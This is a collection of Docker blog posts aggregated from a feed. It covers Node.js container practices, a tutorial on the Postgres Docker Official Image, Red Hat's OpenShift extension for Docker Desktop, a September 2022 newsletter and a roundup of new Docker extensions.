We introduced the docker buildx command to help you build multi-architecture images. Buildx is a Docker component that enables many powerful build features with a familiar Docker user experience. All Buildx builds run using the Moby BuildKit engine.

BuildKit is designed to excel at multi-platform builds, or those not just targeting the user’s local platform. When you invoke a build, you can set the --platform flag to specify the build output’s target platform (like linux/amd64, linux/arm/v7, linux/arm64/v8, etc.):

docker buildx build --platform linux/amd64,linux/arm/v7 -t node-docker .

8) Explore graceful shutdown options for Node

Docker containers are ephemeral in nature. They can be stopped and destroyed, then either rebuilt or replaced with minimal effort. Containers are terminated by sending a SIGTERM signal to the process, followed by a short grace period before a forced kill. That grace period requires you to ensure that your app handles ongoing requests and cleans up resources in a timely fashion.

On the other hand, Node.js accepts and forwards signals like SIGINT and SIGTERM from the OS, which is key to properly shutting down your app. Node.js lets your app decide how to handle those signals. If you don’t write code or use a module to handle them, your app won’t shut down gracefully. It’ll ignore those signals until Docker or Kubernetes kills it after a timeout period. 

Using certain init options like docker run --init or tini within your Dockerfile is viable when you can’t change your app code. However, we recommend writing code to handle proper signal handling for graceful shutdowns.
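As a sketch of that first option (my-node-app is a hypothetical image name), enabling an init process at runtime looks like this — the init process becomes PID 1 and forwards signals to your app:

docker run --init -d -p 3000:3000 my-node-app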

Check out this video from Docker Captain Bret Fisher (12:57) where he covers all three available Node shutdown options in detail.

9) Use the OpenTelemetry API to measure Node.js performance

How do Node developers make their apps faster and more performant? Generally, developers rely on third-party observability tools to measure application performance. This performance monitoring is essential for creating multi-functional Node applications with top-notch user experiences.

Observability extends beyond application performance. Metrics, traces, and logs are now front and center. Metrics help developers to understand what’s wrong with the system, while traces help you discover how it’s wrong. Logs tell you why it’s wrong. Developers can dig into particular metrics and traces to holistically understand system behavior.

Observing Node applications means tracking your Node metrics, request rates, request error rate, and request durations. OpenTelemetry is one popular collection of tools and APIs that help you instrument your Node.js application.

You can also use an open-source tool like SigNoz to analyze your app’s performance. Since SigNoz offers a full-stack observability tool, you don’t need to rely on multiple tools.

Conclusion

In this guide, we explored many ways to optimize your Docker images — from carefully crafting your Dockerfile to securing your image via Snyk scanning. Building better Node.js apps doesn’t have to be complex. By nailing some core fundamentals, you’ll be in great shape. 

If you’d like to dig deeper, check out these additional recommendations and best practices for building secure, production-grade Docker images:

- Docker development best practices
- Dockerfile best practices
- Building images with BuildKit
- Best practices for scanning images
- Getting started with the Snyk Extension
Source: https://blog.docker.com/feed/

How to Use the Postgres Docker Official Image

Postgres is one of the top relational, multi-model databases currently available. It’s designed to power database applications — which either serve important data directly to end users or through another application via APIs. Your typical website might fit that first example well, while a finance app (like PayPal) typically uses APIs to process GET or POST database requests. 

Postgres’ object-relational structure and concurrency are advantages over alternatives like MySQL. And while no database technology is objectively the best, Postgres shines if you value extensibility, data integrity, and open-source software. It’s highly scalable and supports complex, standards-based SQL queries. 

The Postgres Docker Official Image (DOI) lets you create a Postgres container tailored specifically to your application. This image also handles many core setup tasks for you. We’ll discuss containerization, and the Postgres DOI, and show you how to get started.

In this tutorial:

- Why should you containerize Postgres?
- What’s the Postgres Docker Official Image?
- Can you deploy Postgres containers in production?
- How to run Postgres in Docker
- Enter a quick pull command
- Start a Postgres instance
- Using Docker Compose
- Extending your Postgres image
- 1. Environment variables
- 2. Docker secrets
- 3. Initialization scripts
- 4. Database configuration
- Important caveats and data storage tips
- Jumpstart your next Postgres project today

Why should you containerize Postgres? 

Since your Postgres database application can run alongside your main application, containerization is often beneficial. This makes it much quicker to spin up and deploy Postgres anywhere you need it. Containerization also separates your data from your database application. Should your application fail, it’s easy to launch another container while shielding your data from harm. 

This is simpler than installing Postgres locally, performing additional configuration, and starting your own background processes. Such workflows take extra time, require deeper technical knowledge, and don’t adapt well to changing application requirements. That’s why Docker containers come in handy — they’re approachable and tuned for rapid development.

What’s the Postgres Docker Official Image?

Like any other Docker image, the Postgres Docker Official Image contains all source code, core dependencies, tools, and libraries your application needs. The Postgres DOI tells your database application how to behave and interact with data. Meanwhile, your Postgres container is a running instance of this standard image.

Specifically, Postgres is perfect for the following use cases:

- Connecting Docker shared volumes to your application
- Testing your storage solutions during development
- Testing your database application against newer versions of your main application or Postgres itself

The PostgreSQL Docker Community maintains this image and added it to Docker Hub due to its widespread appeal.

Can you deploy Postgres containers in production?

Yes! Though this answer comes with some caveats and depends on how many containers you want to run simultaneously. 

While it’s possible to use the Postgres Official Image in production, Docker Postgres containers are best suited for local development. This lets you use tools like Docker Compose to collectively manage your services. You aren’t forced to juggle multiple database containers at scale, which can be challenging. 

Launching production Postgres containers means using an orchestration system like Kubernetes to stay up and running. You may also need third-party components to supplement Docker’s offerings. However, you can absolutely give this a try if you’re comfortable with Kubernetes! Arctype’s Shanika Wickramasinghe shares one method for doing so.

For these reasons, you can perform prod testing with just a few containers. But, it’s best to reconsider your deployment options for anything beyond that.

How to run Postgres in Docker

To begin, download the latest Docker Desktop release and install it. Docker Desktop includes the Docker CLI, Docker Compose, and supplemental development tools. Meanwhile, the Docker Dashboard (Docker Desktop’s UI component) will help you manage images and containers. 

Afterward, it’s time to Dockerize Postgres!

Enter a quick pull command

Pulling the Postgres Docker Official Image is the fastest way to get started. In your terminal, enter docker pull postgres to grab the latest Postgres version from Docker Hub. 

Alternatively, you can pin your preferred version with a specific tag. Though we usually associate pinning with Dockerfiles, the concept is similar to a basic pull request. 

For example, you’d enter the docker pull postgres:14.5 command if you prefer postgres v14.5. Generally, we recommend using a specific version of Postgres. The :latest version automatically changes with each new Postgres release — and it’s hard to know if those newer versions will introduce breaking changes or vulnerabilities. 

Either way, Docker will download your Postgres image locally onto your machine. Here’s how the process looks via the CLI:

Once the pull is finished, your terminal should notify you. You can also confirm this within Docker Desktop! From the left sidebar, click the Images tab and scan the list that appears in the main window. Docker Desktop will display your postgres image, which weighs in at 355.45 MB.

Postgres is one of the slimmest major database images on Docker Hub. But alpine variants are also available to further reduce image size, since they include only basic packages (perfect for simpler projects). You can learn more about Alpine’s benefits in our recent Docker Official Image article.

Next up, what if you want to run your new image as a container? While many other images let you hover over them in the list and click the blue “Run” button that appears, Postgres needs a little extra attention. Being a database, it requires you to set environment variables before forming a successful connection. Let’s dive into that now.

Start a Postgres instance

Enter the following docker run command to start a new Postgres instance or container: 

docker run --name some-postgres -e POSTGRES_PASSWORD=mysecretpassword -d postgres

This creates a container named some-postgres and assigns important environment variables before running everything in the background. Postgres requires a password to function properly, which is why that’s included. 

If you have this password already, you can spin up a Postgres container within Docker Desktop. Just click that aforementioned “Run” button beside your image, then manually enter this password within the “Optional Settings” pane before proceeding. However, you can also use the Postgres interactive terminal, or psql, to query Postgres directly:

docker run -it --rm --network some-network postgres psql -h some-postgres -U postgres
psql (14.3)
Type "help" for help.

postgres=# SELECT 1;
 ?column?
----------
        1
(1 row)

Using Docker Compose

Since you’re likely using multiple services, or even a database management tool, Docker Compose can help you run instances more efficiently. With a single YAML file, you can define how your services work. Here’s an example for Postgres:

services:
  db:
    image: postgres
    restart: always
    environment:
      POSTGRES_PASSWORD: example
    volumes:
      - pgdata:/var/lib/postgresql/data

  adminer:
    image: adminer
    restart: always
    ports:
      - 8080:8080

volumes:
  pgdata:

You’ll see that both services are set to restart: always. This makes our data accessible whenever our applications are running and keeps the Adminer management service active simultaneously. When a container fails, this ensures that a new one starts right up.

Say you’re running a web app that needs data immediately upon startup. Your Docker Compose file would reflect this. You’d add your web service and the depends_on parameter to specify startup and shutdown dependencies between services. Borrowing from our docs on controlling startup and shutdown order, your expanded Compose file might look like this:

services:
  web:
    build: .
    ports:
      - "80:8000"
    depends_on:
      db:
        condition: service_healthy
    command: ["python", "app.py"]

  db:
    image: postgres
    restart: always
    environment:
      POSTGRES_PASSWORD: example
    healthcheck:
      test: ["CMD-SHELL", "pg_isready"]
      interval: 1s
      timeout: 5s
      retries: 10

  adminer:
    image: adminer
    restart: always
    ports:
      - 8080:8080

To launch your Postgres database and supporting services, enter the docker compose -f [FILE NAME] up command. 

Using either docker run, psql, or Docker Compose, you can successfully start up Postgres using the Official Image! These are reliable ways to work with “default” Postgres. However, you can configure your database application even further.

Extending your Postgres image

There are many ways to customize or configure your Postgres image. Let’s tackle four important mechanisms that can help you.

1. Environment variables

We’ve touched briefly on the importance of POSTGRES_PASSWORD to Postgres. Without specifying this, Postgres can’t run effectively. But there are also other variables that influence container behavior: 

- POSTGRES_USER – Specifies a user with superuser privileges and a database with the same name. Postgres uses the default user when this is empty.
- POSTGRES_DB – Specifies a name for your database, or defaults to the POSTGRES_USER value when left blank.
- POSTGRES_INITDB_ARGS – Sends arguments to postgres_initdb and adds functionality.
- POSTGRES_INITDB_WALDIR – Defines a specific directory for the Postgres transaction log. A transaction is an operation and usually describes a change to your database.
- POSTGRES_HOST_AUTH_METHOD – Controls the auth-method for host connections to all databases, users, and addresses.
- PGDATA – Defines another default location or subdirectory for database files.

These variables live within your plain text .env file. Ultimately, they determine how Postgres creates and connects databases. You can check out our GitHub Postgres Official Image documentation for more details on environment variables.

2. Docker secrets

While environment variables are useful, passing them between host and container doesn’t come without risk. Docker secrets let you access and load those values from files already present in your container. This prevents your environment variables from being intercepted in transit over a port connection. You can use the following command (and iterations of it) to leverage Docker secrets with Postgres: 

docker run --name some-postgres -e POSTGRES_PASSWORD_FILE=/run/secrets/postgres-passwd -d postgres

Note: Docker secrets are only compatible with certain environment variables. Reference our docs to learn more.
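Outside of Docker Swarm, the simplest way to try this pattern is to bind-mount a local file at the path the variable points to. A hedged sketch — the local postgres-passwd file is hypothetical:

docker run --name some-postgres \
  -v "$PWD/postgres-passwd:/run/secrets/postgres-passwd:ro" \
  -e POSTGRES_PASSWORD_FILE=/run/secrets/postgres-passwd -d postgres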

3. Initialization scripts

Also called init scripts, these run any executable shell scripts or command-based .sql files once Postgres creates its data folder. This helps you perform any critical operations before your services are fully up and running. Conversely, Postgres will ignore these scripts if the data folder is already initialized.
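The Postgres image runs these scripts from its /docker-entrypoint-initdb.d directory on first initialization. As a sketch, mounting a hypothetical init.sql file there looks like this:

docker run --name some-postgres \
  -v "$PWD/init.sql:/docker-entrypoint-initdb.d/init.sql:ro" \
  -e POSTGRES_PASSWORD=mysecretpassword -d postgres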

4. Database configuration

Your Postgres database application acts as a server, and it’s beneficial to control how it runs. Configuring your database not only determines how your Postgres container talks with other services, but also optimizes how Postgres runs and accesses data. 

There are two ways you can handle database configurations with Postgres. You can either apply these configurations locally within a dedicated file or use the command line. The CLI uses an entrypoint script to pass any Docker commands to the Postgres server daemon for processing. 

Note: Available configurations differ between Postgres versions. The configuration file directory also changes slightly when using an Alpine variant of the Postgres Docker Official Image.

Important caveats and data storage tips

While Postgres can be pretty user-friendly, it does have some quirks. Keep the following in mind while working with your Postgres container images: 

If no database exists when Postgres spins up in a container, it’ll create a default database for you. While this process unfolds, that database won’t accept any incoming connections.
Working with a pre-existing database is best when using Docker Compose to start up multiple services. Otherwise, automation tools may fail while Postgres creates a default.
Docker will throw an error if a Postgres container exceeds its 64 MB shared memory (/dev/shm) allotment.
You can use either a docker run command or Docker Compose to allocate more shared memory to your Postgres containers, as shown in the sketch after this list.
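
A minimal sketch of raising that limit with docker run (256mb is an arbitrary example value):

docker run -d --name some-postgres \
  -e POSTGRES_PASSWORD=example \
  --shm-size=256mb \
  postgres

In Docker Compose, the equivalent is a shm_size: 256mb entry on the service definition.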

Storing your data in the right place

Data accessibility helps Postgres work correctly, so you’ll also want to make sure you’re storing your data in the right place. This location must be visible to both Postgres and Docker to prevent pesky issues. While there’s no perfect storage solution, remember the following: 

Writing files to the host disk through Docker’s internal volume management (Docker-managed) is transparent and user-friendly. However, these files may be inaccessible to tools or apps outside of your containers.
Using bind mounts to connect external data to your Postgres container can solve data accessibility issues. However, you’re responsible for creating the directory and setting up permissions or security.

Lastly, if you decide to start your container via the docker run command, don’t forget to mount the appropriate directory from the host. The -v flag enables this. Browse our Docker run documentation to learn more.
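
As a sketch, mounting a host directory over the image’s default data location looks like this (the host path /my/own/datadir is a placeholder):

docker run -d --name some-postgres \
  -e POSTGRES_PASSWORD=example \
  -v /my/own/datadir:/var/lib/postgresql/data \
  postgres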

Jumpstart your next Postgres project today

As we’ve discovered, harnessing the Postgres Docker Official Image is pretty straightforward in most cases. Since many customizations are available, you only need to explore the extensibility options you’re comfortable with. Postgres even supports extensions, like PostGIS, which can add even deeper functionality. 

Overall, Dockerizing Postgres locally has many advantages. Swing by Docker Hub and pull your first Postgres Docker Official Image to start experimenting. You’ll find even deeper instructions for enhancing your database setup on our Postgres GitHub page. 

Need a springboard? Check out these Docker awesome-compose applications that leverage Postgres: 

Build a Go server with an NGINX proxy and a Postgres database.
Create a sample Postgres and pgAdmin management setup.
Build a React application with a Rust backend and Postgres database.
Create a Java application with Spring Framework and a Postgres database.

Quelle: https://blog.docker.com/feed/

Simplified Deployment of Local Container Images to OpenShift

This guest post is courtesy of our friends over at Red Hat! They’re coming out with some exciting capabilities for the OpenShift Docker Extension and have even more planned in the future. Continue reading to learn more about what the OpenShift Extension is all about, its new features, and how to get started.

Simplified local container image deployment to remote OpenShift environments

Docker Desktop is a commonly used tool to build container images and run them locally. But oftentimes, you need to deploy your apps on an environment other than your localhost. Popular targets include Kubernetes and OpenShift. So, as a developer and user of Docker Desktop, how can you deploy local containers onto remote OpenShift environments without ever leaving the Docker Desktop UI? The answer lies in the Red Hat OpenShift Extension for Docker Desktop.

At Red Hat, we want to make the experience simple when developers target Kubernetes as the runtime environment for their containerized applications. Together with Docker Inc, we have developed the OpenShift Extension for Docker Desktop. This extension allows developers to deploy their Docker containers on a free Developer Sandbox for Red Hat OpenShift environment that they can sign up for, or on any other OpenShift cluster of their choice that they configure. Developers can do all of this without leaving the Docker Desktop UI.

OpenShift Extension capabilities

The Red Hat OpenShift Extension for Docker Desktop enables developers who are working with OpenShift to deploy and test their apps with ease. From the extension UI, it just takes two steps to deploy your containerized app to OpenShift:

1. Choose the target OpenShift context.
2. Choose the Docker image that you want to deploy to OpenShift.

The Red Hat OpenShift Extension provides the following capabilities:

Detection of Kubernetes environments: Scans your local kube-config file and preselects your current Kubernetes context. Users can also quickly switch from one environment to another.
Login to clusters: Users can connect to a new Kubernetes environment on their local workstation by directly using the connection details. An oc login command can be conveniently pasted into the Cluster URL field to automagically separate the URL and the bearer token into their respective fields (see the example after this list).
Listing of projects (namespaces): Browse and select the project in which you want to deploy your application.
Selection of container images: Pick and choose a container image you’ve already built and pushed to a container registry.
Deployment of container images: Generates the resources needed to deploy your container images. A Route is generated automatically to expose your application outside of the cluster. Once deployed, the application automatically opens in a new browser tab.
Push to Docker Hub and deploy: Users can select a container image, push it to Docker Hub, and deploy it to OpenShift in a single click.
Push to the OpenShift registry and deploy: Users can select a container image, push it to the OpenShift registry, and deploy it to OpenShift in one swift motion.
Open the Console Dashboard: Quickly accessible from the extension UI, users can open the OpenShift Console Dashboard in the browser, if it’s exposed.
Free access to the OpenShift Developer Sandbox: Users can create a free account on the OpenShift Developer Sandbox to get an OpenShift environment in the cloud.
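
For reference, a pasted oc login command generally has the following shape; the token and server URL here are placeholders:

oc login --token=sha256~XXXXXXXXXXXX --server=https://api.my-cluster.example.com:6443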

Getting started with the OpenShift Extension

The following is a quick walkthrough covering setup and usage for the Red Hat OpenShift Extension for Docker Desktop.

Discovering and experimenting with Red Hat OpenShift 

While the extension only works with Red Hat OpenShift, don’t worry if you don’t have access to it; we’ve got you covered. You can sign up for a free Red Hat Developer Sandbox and get an OpenShift environment in the cloud. No setup needed! 

What the future holds for the extension

Red Hat is committed to adding more capabilities to the extension. One of our favorites is Watch Mode: the extension will watch for changes in your source code and automatically build, push, and deploy the application to your preferred OpenShift cluster.

Get started with the Red Hat OpenShift Docker Extension

The Red Hat OpenShift Extension is available on the extensions marketplace. To get a free Red Hat OpenShift environment and try out the extension, explore our Red Hat Developer Sandbox.

Learn more and get involved

If you’d like to learn more about the OpenShift Extension for Docker Desktop, visit the following:

OpenShift Docker Desktop Extension repository
The on-demand session of Introducing Red Hat OpenShift Extension for Docker Desktop at DockerCon

If you want to share your feedback, suggestions, and ideas or report an issue, please use the GitHub repository for the extension.

Want to learn more about Red Hat, other Docker Extensions, and more container-related topics? See the following for additional information.

Download and install Docker Desktop for Windows, Linux, or Mac.
Find more details on the Red Hat OpenShift Extension.
Read similar articles covering new Docker Extensions.
Search for more handy extensions on Docker Hub.
Learn how to create your own Docker Extensions.
Check out the repository for the OpenShift Extension.
Start a free developer sandbox for Red Hat OpenShift.
Quelle: https://blog.docker.com/feed/

September 2022 Newsletter

Hacktoberfest 2022
Since the launch of Docker Extensions, we’ve received numerous requests from the community, asking for new extensions they’d like to see implemented. That’s why we’re glad to announce that we’ll be official partners of Hacktoberfest 2022 with Docker Extensions!

Learn More

News you can use and monthly highlights:
Opinionated Docker development workflow for Node.js projects – Are you planning to containerize your Node.js project? Here’s a quick step-by-step guide for developing and testing your Node.js app using Docker and best practices.
A command line tool to create development environments for AI/ML based on buildkit – Is your AI/ML development team still struggling with system dependencies and clunky tooling that often breaks your app? If so, check out this new command line tool! Envd will help you create a container-based development environment for your AI/ML solution.
The smallest Docker image to serve static websites – Would you believe us if we said you can host your website on a 154KB Docker container? See for yourself! Here’s an article that shows how you can successfully run a static website on such a tiny Docker container.
Using Docker manifest to create multi-arch images on AWS Graviton processors – Building Docker images for multiple architectures has become increasingly popular. This blog post introduces a Docker manifest utility that helps developers build separate images for each architecture. These can then be joined into a multi-arch image when it’s time to share.
Deploying and Scaling the Official Strapi Demo App “FoodAdvisor” with Kubernetes and Docker – Here’s an article that shows how a shift from a monolith to a microservices architecture can help you build a highly scalable and performant application.

Monthly Extensions Roundup: Test APIs, Use Oracle SQLcl, and More!
Find out what’s new this month in the Docker Extension Marketplace! Access InterSystems, test APIs, use Oracle SQLcl, and backup/share volumes — right from Docker Desktop.

Learn More

The latest tips and tricks from the community:

How to Colorize Black & White Pictures With OpenVINO™ on Ubuntu Containers
Containerizing a Slack Clone App Built with the MERN Stack
Four Ways Docker Boosts Enterprise Software Development
Clarifying Misconceptions About Web3 and Its Relevance With Docker
Bring Continuous Integration to Your Laptop With the Drone CI Docker Extension

Community All-Hands Recap
The sessions from our 6th Community All-Hands are now available to watch on-demand. If you couldn’t make it to the event, fear not! You can still join in and learn at your own pace. Here’s what you missed.

Get the Recap

Educational content created by the experts at Docker:

How to Set Up Your Local Node.js Development Environment Using Docker
How to Build and Run Next.js Applications with Docker, Compose, & NGINX
How to Use the Alpine Docker Official Image
What is the Best Container Security Workflow for Your Organization?
Dear Moby: Kubernetes in Production Environments

Docker Captain: James Spurin
We couldn’t be more excited to whalecome James Spurin to the Captain crew. Learn more about his free K8s intro course focused on community giveback, his goals for the Docker community, and a few of his favorite Dockerfile best practices.

Meet the Captain

See what the Docker team has been up to:

Extending Docker’s Integration with containerd
The Docker-Sponsored Open Source Program has a new look!
Integrated Terminal for Running Containers, Extended Integration with Containerd, and More in Docker Desktop 4.12
Announcing Docker Hub Export Members
Conversation with RedMonk: Developer Engagement in the Remote Work Era

Back Up and Share Docker Volumes with This Extension
We’ve heard your feedback and added the ability to back up and share volumes right within Docker Desktop! Our new Volumes Backup & Share Extension lets you easily back up, clone, restore, and share Docker volumes. 

Learn More

Subscribe to our newsletter to get the latest news, blogs, tips, how-to guides, best practices, and more from Docker experts sent directly to your inbox once a month.

Quelle: https://blog.docker.com/feed/

September Extensions Roundup: Test APIs, Use Oracle SQLcl, and More

Docker Extensions build new functionality into Docker Desktop, extend its existing capabilities, and allow you to discover and integrate additional tools that you’re already using with Docker. More extensions are added every month, so let’s take a look at some of them released in September. And if you’d like to see everything available, check out our full Extensions Marketplace!
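
If you prefer the terminal, Docker Desktop also ships a docker extension CLI for managing extensions. As a quick sketch (the image name below is a placeholder; real extension images are listed in the Marketplace):

docker extension install myorg/sample-extension:latest
docker extension ls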

InterSystems

The new InterSystems extension is a convenient way to access InterSystems Container Registry right from Docker Desktop. It provides an integrated UI that contains public and private images for products like IRIS, IRIS for Health, and many more. With the extension, you can:

Observe the list of public images available (and private images if you have access to WRC)
Filter images by name, tag, and ARM64
Easily pull images
Delete local images
Copy image name with tag

Microcks

Looking to mock or test an API? If so, the Microcks extension can help. With Microcks, you can:

Mock REST APIs by importing a local OpenAPI specification or Postman collection
Mock GraphQL APIs by importing a GraphQL schema and samples via Postman collections
Mock gRPC APIs by importing Protobuf and samples via Postman collections
Simulate event-driven APIs (both on Kafka and WebSockets) by importing an AsyncAPI specification
Test local REST, GraphQL, gRPC, WebSocket, and Kafka endpoints to check conformance
Bootstrap your API specification using Direct APIs

Oracle SQLcl Client Tool

Oracle SQLcl (SQL Developer Command Line) is a Java-based command line interface for Oracle Database. Using SQLcl, you can execute SQL and PL/SQL statements in interactive or batch mode. The Oracle SQLcl Client Tool extension provides:

Inline editing
Statement completion
Command recall
Support for your existing SQL*Plus scripts

Volumes Backup & Share

Volumes are the best choice when you need to back up, restore, or migrate data from one Docker host to another. With the Volumes Backup & Share extension, you can:

Back up data that’s persisted in a volume (for example, database data from Postgres or MySQL) into a compressed file
Upload your backup to Docker Hub and share it with anyone
Create a new volume from an existing backup or restore the state of an existing volume
Transfer your local volumes to a different Docker host (through SSH)
Perform other basic volume operations like clone, empty, and delete

To learn more, check out our blog post.

Check out the latest Docker Extensions with Docker Desktop

Docker is always looking for ways to improve the developer experience. We hope that these new extensions will make your life easier and that you’ll give them a try! Check out these resources for more info on extensions:

Try September’s newest extensions by installing Docker Desktop for Mac, Windows, or Linux.
Visit our Extensions Marketplace to see all of our extensions.
Build your own extension with our Extensions SDK.
Quelle: https://blog.docker.com/feed/